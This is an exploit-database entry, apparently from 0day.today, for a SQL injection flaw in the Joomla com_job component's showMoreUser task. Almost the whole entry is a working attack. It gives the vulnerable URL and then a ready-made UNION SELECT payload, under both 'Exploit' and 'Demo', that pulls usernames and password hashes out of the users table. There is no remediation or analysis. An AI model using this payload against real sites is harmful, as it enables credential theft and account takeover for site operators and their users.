id: 10120
date: 12/08/2009
title: Joomla Component com_job ( showMoreUse) SQL injection vulnerability
author: Palyo34
cves: 

===================================================================
Joomla Component com_job ( showMoreUse) SQL injection vulnerability
===================================================================

===========================================================================
   
  
   
http://server/index.php?option=com_job&task=showMoreUser&id=[SQL]
   
[ Exploit ]
   
index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--
 
[ Demo ]
 
http://www.site.com/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--
   
   
===========================================================================



#  0day.today [2023-03-26]  #